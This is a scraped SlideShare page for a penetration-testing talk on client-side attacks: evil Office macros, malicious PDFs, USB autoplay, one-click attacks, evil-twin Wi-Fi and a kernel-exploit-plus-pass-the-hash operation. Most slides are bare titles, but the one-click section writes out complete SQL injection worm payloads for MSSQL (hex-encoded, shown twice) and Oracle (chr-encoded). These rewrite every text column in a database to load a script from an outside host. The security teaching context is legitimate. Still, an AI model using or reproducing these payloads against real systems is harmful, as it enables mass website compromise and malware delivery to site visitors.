SlideShare a Scribd company logo

Tactical Client Attacks

Prathan Phongthiproek
Prathan Phongthiproek

The document discusses various client-side attack techniques, including exploiting Microsoft Office macros and malicious PDF files to execute code on targets' machines. It also covers USB-based attacks, SQL injection worms, and wireless evil twin attacks. The speaker advocates using "black hat" tactics like these during penetration tests to think outside the box and effectively compromise systems. An example operation called "CloudBurst" is described that starts with client-side attacks and pivots to a local kernel exploit and internal pass-the-hash attacks to fully compromise the target network.

1 of 48
Download to read offline
Tactical Assassins : Client-Side OWNage Prathan Phongthiproek ACIS Professional Center Senior Information Security Consultant
Who am I ?!   Instructor / Speaker   Red Team : Penetration Tester (Team Leader)   Security Consultant / Researcher   CWH Underground   Exploits and Vulnerabilities Disclosure   Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
Let’s Talk!   Attack Layer 8: Client-Side OWNage   MS Office (Evil Macro)   Malicious Adobe PDF   Malicious USB   One-Click Attack   Evil-Twin Attack!   Built-in Pen-Test Tactics   Black Hat versus White Hat   Using Black Hat styles to Compromise system   Operation CloudBurst
Client-Side OWNage The Way to Attack Layer 8!
MS Office (Evil Macro)!   MS Office is Evil !!
MS Office (Evil Macro)!
MS Office (Evil Macro)!
MS Office (Evil Macro)!
Malicious Adobe PDF!
Malicious Adobe PDF!
Malicious Adobe PDF!
Malicious Adobe PDF!
Malicious Adobe PDF! Malicious PDF File
Malicious Adobe PDF!
Malicious Adobe PDF!
Malicious USB!   Autoplay NOT Autorun
Malicious USB!   Turn Off Autoplay -> It’s still vulnerable from evil usb
Malicious USB!
Malicious USB!
Malicious USB! 0xff HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
Malicious USB!
One-Click Attack!
One-Click Attack!
One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004100520045002000400054002000760061 0072006300680061007200280032003500350029002C004000430 02000760061007200630068006100720028003200350035002900 20004400450043004C0041005200450020005400610062006C00 65005F0043007500720073006F007200200043005500520053004 F005200200046004F0052002000730065006C006500630074002 00061002E006E0061006D0065002C0062002E006E0061006D00 65002000660072006F006D0020007300790073006F0062006A00 6500630074007300200061002C0073007900730063006F006C00 75006D006E007300200062002000770068006500720065002000 61002E00690064003D0062002E0069006400200061006E006400 200061002E00780074007900700065003D002700750027002000 61006E0064002000280062002E00780074007900700065003D00 3900390020006F007200200062002E00780074007900700065003 D003300350020006F007200200062002E0078007400790070006 5003D0032003300310020006F007200200062002E00780074007 900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2 5 5 ) D E C LAR E T a b l e _ C u r s o r C U R S O R F O R select a.name,b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtyp e='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table _Cursor FETCH NEXT FROM Table_Curs o r I NTO @T, @ C W H I LE ( @ @ F ETC H _ STATU S=0) BEGIN exec('update ['+@T+'] set [' +@C+']=rtrim(convert(varchar,['+@C+'])) +''<script src=http://www.fengnima.cn/k.j s></script>''')FETCH NEXT FROM Table_ Cursor INTO @T,@C END CLOSE Table_C u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS %20NVARCHAR(4000));EXEC(@S);--
One-Click Attack!   SQL Injection Worms - Oracle!   http://127.0.0.1:81/ora4.php?name=1 and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES ('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin execute immediate '''''''' alter session set current_schema=SCOTT ''''''''; execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)|| chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)|| chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)|| chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)|| chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)|| chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)|| chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr (101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)|| chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)|| chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME = C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr (82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr (72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE IMMEDIATE rec.foo;end loop;execute immediate ''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
One-Click Attack!
One-Click Attack!
One-Click Attack!
One-Click Attack!
One-Click Attack! Link to Malicious Website Reverse Shell to Attackers
One-Click Attack!
Evil-Twin Attack!   Karma + Metasploit = Karmetasploit !!   Rouge Access Point (Evil Twin): Steal usernames, passwords and information from public wireless hotspots   Why we don’t steal something evil like credit card (Pay to Play) ??
Evil-Twin Attack!
Evil-Twin Attack!
Evil-Twin Attack!
Built-in Pen-Test Tactics!
Black Hat versus White Hat!   Thinking Outside of the Box   Thinking Inside the box   Know one piece of information   Assigned Limited block of IP and have to expand from there address   Compromise all system and   Unable to go beyond the scope Target Attack of approved list, Only touch xyz hosts, Don’t touch abc host.   All Methodologies was Integrate   Follow Pen-Test Methodologies; OSSTMM, NIST, ISSAF   Download Exploit from Milw0rm,   Manual Foot printing, No noisy Exploit with Core Impact, scan, Just Nmap and 0-Day CANVAS, Metasploit Attack   Oops, I cannot hack user.   Attack Layer 8 :Client-Side OWNage
Using Black Hat styles to Compromise system   Pen-Tester Must “Thinking outside of the box”   Attack Layer 8 : More effective result   Pen-Test with Black Hat styles   Using Black Hat Mind   Email Address Enumeration   Social Networking (Maltego)   Social Engineering (Adobe PDF, Evil Macro, One-Click Attack, IE Aurora, etc)   Information Gathering All subdomain   xyz.victim.com, abc.victim.com, 123.victim.com   Blind Test, Compromise all system and Target Attack
Using Black Hat styles to Compromise system
Operation CloudBurst!
KiTra0d – Local Ring0 Kernel Exploit   MS Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit, Itanium)   Patch release MS10-015 on Feb 09 2010 Get The Hell Outta Here !!   0-day for 1 month. W00t ! W00t !
KiTra0d – Local Ring0 Kernel Exploit
Token Kidnapping – Elevate Privilege   Token - Web Cookies   On Windows XP / 2003 – Windows Service run as SYSTEM account   Compromise of a Service == Full System Compromise   On Windows Vista / 2008 - LocalService / NetworkService == System   Affect every release of the Windows NT kernel (Window 2000, XP, Server 2003, Vista, Server 2008, 7)   Patch release MS09-012 on April 14 2009   0-day for 1 year. W00t ! W00t !!   Black hat Mind !!   Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
Operation CloudBurst   Start Mission with Attack Layer 8   SPAM Mail / 1-Click Ownage   Reverse Shell to Attacker   KiTrap0D – The Message From Slave to God   0-Day Ring0 xpl, All Windows OS   Maintain Access   Pivot (Tunneling), Backdoor Position   Compromise All System and Domain Controller   Impersonate Token, Pass-The-Hash Attack
Operation CloudBurst! Intranet Reverse Shell connection to Attacker Internet Attack Network – Passthehash, KiTrap0d XPL impersonate Token Pivot Network – Route Add
If someone is still in the room.. Q&A! THANK YOU!

Recommended

Moony li pacsec-1.8
Moony li pacsec-1.8Moony li pacsec-1.8
Moony li pacsec-1.8PacSecJP
 
Config mp
Config mpConfig mp
Config mpJuan Manuel Santa Cruz
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the swordPriyanka Aash
 
Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet NoNameCon
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)oscargaliza
 
One Concept Presentation
One Concept PresentationOne Concept Presentation
One Concept PresentationYoomi Lee
 
มนุษย์ สังคม วัฒนธรรม
มนุษย์ สังคม วัฒนธรรมมนุษย์ สังคม วัฒนธรรม
มนุษย์ สังคม วัฒนธรรมPrincess Chulabhorn's College, Chiang Rai Thailand
 

Recommended

Moony li pacsec-1.8
Moony li pacsec-1.8Moony li pacsec-1.8
Moony li pacsec-1.8PacSecJP
 
Config mp
Config mpConfig mp
Config mpJuan Manuel Santa Cruz
 
The Mouse is mightier than the sword
The Mouse is mightier than the swordThe Mouse is mightier than the sword
The Mouse is mightier than the swordPriyanka Aash
 
Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet Lukas Apa - Hacking Robots Before SkyNet
Lukas Apa - Hacking Robots Before SkyNet NoNameCon
 
Understanding the fundamentals of attacks
Understanding the fundamentals of attacksUnderstanding the fundamentals of attacks
Understanding the fundamentals of attacksCyber Security Alliance
 
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)
Anexo normas congresuais proceso fusión comfia fecoht (14-02-14)oscargaliza
 
One Concept Presentation
One Concept PresentationOne Concept Presentation
One Concept PresentationYoomi Lee
 
มนุษย์ สังคม วัฒนธรรม
มนุษย์ สังคม วัฒนธรรมมนุษย์ สังคม วัฒนธรรม
มนุษย์ สังคม วัฒนธรรมPrincess Chulabhorn's College, Chiang Rai Thailand
 
Holiday Invitations
Holiday InvitationsHoliday Invitations
Holiday InvitationsSusan Van Brackle
 
Movie it process
Movie it processMovie it process
Movie it processSana Samad
 
Triangle Gives Back: Helping You Serve Others
Triangle Gives Back: Helping You Serve OthersTriangle Gives Back: Helping You Serve Others
Triangle Gives Back: Helping You Serve OthersTriangle Community Foundation
 
מצגת על לינוקס
מצגת על לינוקסמצגת על לינוקס
מצגת על לינוקסhaimkarel
 
C++ Efficient medicine transfer
C++ Efficient medicine transfer C++ Efficient medicine transfer
C++ Efficient medicine transfer cheeyuan
 
ParaEmpezarGreetings
ParaEmpezarGreetingsParaEmpezarGreetings
ParaEmpezarGreetingsSenoraAmandaWhite
 
Sistema endócrino
Sistema endócrinoSistema endócrino
Sistema endócrinoVictor Hugo
 
Speechwriting
SpeechwritingSpeechwriting
SpeechwritingLauren Held
 
Ariel2 1
Ariel2 1Ariel2 1
Ariel2 1Bakai Magdolna
 
acoooooo
acooooooacoooooo
acoooooophoebeanne
 
ParaEmpezarNumbers
ParaEmpezarNumbersParaEmpezarNumbers
ParaEmpezarNumbersSenoraAmandaWhite
 
nextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM PresentationnextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM PresentationnextNY
 
Memo Case 2
Memo Case 2Memo Case 2
Memo Case 2Nataliaivanov
 
Hyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van WouterHyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van Wouterguest2f17d3
 
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...ZFConf Conference
 
Homophones Lesson
Homophones LessonHomophones Lesson
Homophones Lessonjgd7971
 
Design For My Presentation
Design For My PresentationDesign For My Presentation
Design For My Presentationjiayin2503
 
Manifesto para o día 13 de xuño
Manifesto para o día 13 de xuñoManifesto para o día 13 de xuño
Manifesto para o día 13 de xuñooscargaliza
 
Client Presentation
Client PresentationClient Presentation
Client PresentationVibhanshu Sharma
 
Palestine – Israel
Palestine – IsraelPalestine – Israel
Palestine – Israelhaimkarel
 
Ransomware the clock is ticking
Ransomware the clock is tickingRansomware the clock is ticking
Ransomware the clock is tickingManoj Kumar Mishra
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!Roberto Martelloni
 

More Related Content

Viewers also liked

Movie it process
Movie it processMovie it process
Movie it processSana Samad
 
מצגת על לינוקס
מצגת על לינוקסמצגת על לינוקס
מצגת על לינוקסhaimkarel
 
C++ Efficient medicine transfer
C++ Efficient medicine transfer C++ Efficient medicine transfer
C++ Efficient medicine transfer cheeyuan
 
Sistema endócrino
Sistema endócrinoSistema endócrino
Sistema endócrinoVictor Hugo
 
nextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM PresentationnextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM PresentationnextNY
 
Hyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van WouterHyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van Wouterguest2f17d3
 
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...ZFConf Conference
 
Homophones Lesson
Homophones LessonHomophones Lesson
Homophones Lessonjgd7971
 
Design For My Presentation
Design For My PresentationDesign For My Presentation
Design For My Presentationjiayin2503
 
Manifesto para o día 13 de xuño
Manifesto para o día 13 de xuñoManifesto para o día 13 de xuño
Manifesto para o día 13 de xuñooscargaliza
 
Palestine – Israel
Palestine – IsraelPalestine – Israel
Palestine – Israelhaimkarel
 

Viewers also liked (20)

Holiday Invitations
Holiday InvitationsHoliday Invitations
Holiday Invitations
 
Movie it process
Movie it processMovie it process
Movie it process
 
Triangle Gives Back: Helping You Serve Others
Triangle Gives Back: Helping You Serve OthersTriangle Gives Back: Helping You Serve Others
Triangle Gives Back: Helping You Serve Others
 
מצגת על לינוקס
מצגת על לינוקסמצגת על לינוקס
מצגת על לינוקס
 
C++ Efficient medicine transfer
C++ Efficient medicine transfer C++ Efficient medicine transfer
C++ Efficient medicine transfer
 
ParaEmpezarGreetings
ParaEmpezarGreetingsParaEmpezarGreetings
ParaEmpezarGreetings
 
Sistema endócrino
Sistema endócrinoSistema endócrino
Sistema endócrino
 
Speechwriting
SpeechwritingSpeechwriting
Speechwriting
 
Ariel2 1
Ariel2 1Ariel2 1
Ariel2 1
 
acoooooo
acooooooacoooooo
acoooooo
 
ParaEmpezarNumbers
ParaEmpezarNumbersParaEmpezarNumbers
ParaEmpezarNumbers
 
nextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM PresentationnextNY Online Marketing School - SEM Presentation
nextNY Online Marketing School - SEM Presentation
 
Memo Case 2
Memo Case 2Memo Case 2
Memo Case 2
 
Hyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van WouterHyves Cbw Mitex Harry Van Wouter
Hyves Cbw Mitex Harry Van Wouter
 
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
ZFConf 2010: Zend Framework & MVC, Model Implementation (Part 2, Dependency I...
 
Homophones Lesson
Homophones LessonHomophones Lesson
Homophones Lesson
 
Design For My Presentation
Design For My PresentationDesign For My Presentation
Design For My Presentation
 
Manifesto para o día 13 de xuño
Manifesto para o día 13 de xuñoManifesto para o día 13 de xuño
Manifesto para o día 13 de xuño
 
Client Presentation
Client PresentationClient Presentation
Client Presentation
 
Palestine – Israel
Palestine – IsraelPalestine – Israel
Palestine – Israel
 

Similar to Tactical Client Attacks

Ransomware the clock is ticking
Ransomware the clock is tickingRansomware the clock is ticking
Ransomware the clock is tickingManoj Kumar Mishra
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?Saumil Shah
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesMaxime ALAY-EDDINE
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014Bryce Kunz
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZeditsRod Soto
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...kbour23
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)ITCamp
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortVincent Ohprecio
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack awsJen Andre
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinreconvillage
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Juniper Networks
 
OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slidesguestd34230
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
 

Similar to Tactical Client Attacks (20)

Ransomware the clock is ticking
Ransomware the clock is tickingRansomware the clock is ticking
Ransomware the clock is ticking
 
WannaCry? No Thanks!
WannaCry? No Thanks!WannaCry? No Thanks!
WannaCry? No Thanks!
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
White Lightning Sept 2014
White Lightning Sept 2014White Lightning Sept 2014
White Lightning Sept 2014
 
AktaionPPTv5_JZedits
AktaionPPTv5_JZeditsAktaionPPTv5_JZedits
AktaionPPTv5_JZedits
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
 
Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)Cryptography - You're doing it wrong! (Attila Balazs)
Cryptography - You're doing it wrong! (Attila Balazs)
 
Hacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades shortHacking school computers for fun profit and better grades short
Hacking school computers for fun profit and better grades short
 
Threat stack aws
Threat stack awsThreat stack aws
Threat stack aws
 
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkinRv defcon25 keeping an eye on mobile applications - mikhail sosonkin
Rv defcon25 keeping an eye on mobile applications - mikhail sosonkin
 
How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?How to save home PCs for being Zombies ?
How to save home PCs for being Zombies ?
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
 
OWASP PHPIDS talk slides
OWASP PHPIDS talk slidesOWASP PHPIDS talk slides
OWASP PHPIDS talk slides
 
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 

More from Prathan Phongthiproek

The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationPrathan Phongthiproek
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationPrathan Phongthiproek
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! Prathan Phongthiproek
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksPrathan Phongthiproek
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Prathan Phongthiproek
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingPrathan Phongthiproek
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Prathan Phongthiproek
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopPrathan Phongthiproek
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedPrathan Phongthiproek
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetPrathan Phongthiproek
 

More from Prathan Phongthiproek (20)

Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)Mobile Defense-in-Dev (Depth)
Mobile Defense-in-Dev (Depth)
 
The CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team OperationThe CARzyPire - Another Red Team Operation
The CARzyPire - Another Red Team Operation
 
Cyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application ExploitationCyber Kill Chain: Web Application Exploitation
Cyber Kill Chain: Web Application Exploitation
 
Mobile App Hacking In A Nutshell
Mobile App Hacking In A NutshellMobile App Hacking In A Nutshell
Mobile App Hacking In A Nutshell
 
Jump-Start The MASVS
Jump-Start The MASVSJump-Start The MASVS
Jump-Start The MASVS
 
OWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-DiveOWASP Mobile Top 10 Deep-Dive
OWASP Mobile Top 10 Deep-Dive
 
The Hookshot: Runtime Exploitation
The Hookshot: Runtime ExploitationThe Hookshot: Runtime Exploitation
The Hookshot: Runtime Exploitation
 
Understanding ransomware
Understanding ransomwareUnderstanding ransomware
Understanding ransomware
 
OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure! OWASP Day - OWASP Day - Lets secure!
OWASP Day - OWASP Day - Lets secure!
 
Don't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application AttacksDon't Trust, And Verify - Mobile Application Attacks
Don't Trust, And Verify - Mobile Application Attacks
 
Owasp Top 10 Mobile Risks
Owasp Top 10 Mobile RisksOwasp Top 10 Mobile Risks
Owasp Top 10 Mobile Risks
 
Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20Point-Of-Sale Hacking - 2600Thailand#20
Point-Of-Sale Hacking - 2600Thailand#20
 
OWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration TestingOWASP Thailand-Beyond the Penetration Testing
OWASP Thailand-Beyond the Penetration Testing
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]
 
Hack and Slash: Secure Coding
Hack and Slash: Secure CodingHack and Slash: Secure Coding
Hack and Slash: Secure Coding
 
CDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest WorkshopCDIC 2013-Mobile Application Pentest Workshop
CDIC 2013-Mobile Application Pentest Workshop
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Layer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load TargetLayer8 exploitation: Lock'n Load Target
Layer8 exploitation: Lock'n Load Target
 
Advanced Malware Analysis
Advanced Malware AnalysisAdvanced Malware Analysis
Advanced Malware Analysis
 
Tisa mobile forensic
Tisa mobile forensicTisa mobile forensic
Tisa mobile forensic
 

Tactical Client Attacks

  • 1. Tactical Assassins : Client-Side OWNage Prathan Phongthiproek ACIS Professional Center Senior Information Security Consultant
  • 2. Who am I ?!   Instructor / Speaker   Red Team : Penetration Tester (Team Leader)   Security Consultant / Researcher   CWH Underground   Exploits and Vulnerabilities Disclosure   Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
  • 3. Let’s Talk!   Attack Layer 8: Client-Side OWNage   MS Office (Evil Macro)   Malicious Adobe PDF   Malicious USB   One-Click Attack   Evil-Twin Attack!   Built-in Pen-Test Tactics   Black Hat versus White Hat   Using Black Hat styles to Compromise system   Operation CloudBurst
  • 4. Client-Side OWNage The Way to Attack Layer 8!
  • 5. MS Office (Evil Macro)!   MS Office is Evil !!
  • 6. MS Office (Evil Macro)!
  • 7. MS Office (Evil Macro)!
  • 8. MS Office (Evil Macro)!
  • 13. Malicious Adobe PDF! Malicious PDF File
  • 17. Malicious USB!   Turn Off Autoplay -> It’s still vulnerable from evil usb
  • 20. Malicious USB! 0xff HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer
  • 24. One-Click Attack!   SQL Injection Worms - MSSQL!   ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST (0x4400450043004C004100520045002000400054002000760061 0072006300680061007200280032003500350029002C004000430 02000760061007200630068006100720028003200350035002900 20004400450043004C0041005200450020005400610062006C00 65005F0043007500720073006F007200200043005500520053004 F005200200046004F0052002000730065006C006500630074002 00061002E006E0061006D0065002C0062002E006E0061006D00 65002000660072006F006D0020007300790073006F0062006A00 6500630074007300200061002C0073007900730063006F006C00 75006D006E007300200062002000770068006500720065002000 61002E00690064003D0062002E0069006400200061006E006400 200061002E00780074007900700065003D002700750027002000 61006E0064002000280062002E00780074007900700065003D00 3900390020006F007200200062002E00780074007900700065003 D003300350020006F007200200062002E0078007400790070006 5003D0032003300310020006F007200200062002E00780074007 900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
